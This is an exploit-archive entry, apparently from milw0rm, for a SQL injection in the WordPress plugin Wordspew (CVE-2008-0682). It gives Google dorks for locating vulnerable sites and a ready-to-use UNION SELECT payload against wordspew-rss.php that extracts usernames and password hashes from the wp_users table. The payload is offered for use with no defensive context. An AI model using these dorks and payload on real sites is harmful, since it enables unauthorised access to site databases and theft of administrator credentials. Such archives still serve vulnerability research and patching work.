[] NeoSense

WordPress Plugin Wordspew - SQL Injection

Author: S@BUN
type: webapps
platform: php
port: 
date_added: 2008-02-01 
date_updated:  
verified: 1 
codes: OSVDB-41054;CVE-2008-0682 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 

#########################################################################
#
# Wordpress Plugin (wordspew-rss.php) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################

DORK 1 : allinurl: "wordspew-rss.php"

DORK 2 : allinurl: "wp-content/plugins/wordspew"

DORK 3 : allinurl: "wordspew/wordspew-rss.php"

#########################################################################
EXPLOIT :

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users


#########################################################################
# S@BUN                      www.hackturkiye.com                          S@BUN
#########################################################################
# S@BUN                          GOOD LUCKY                                  S@BUN
#########################################################################

# milw0rm.com [2008-02-02]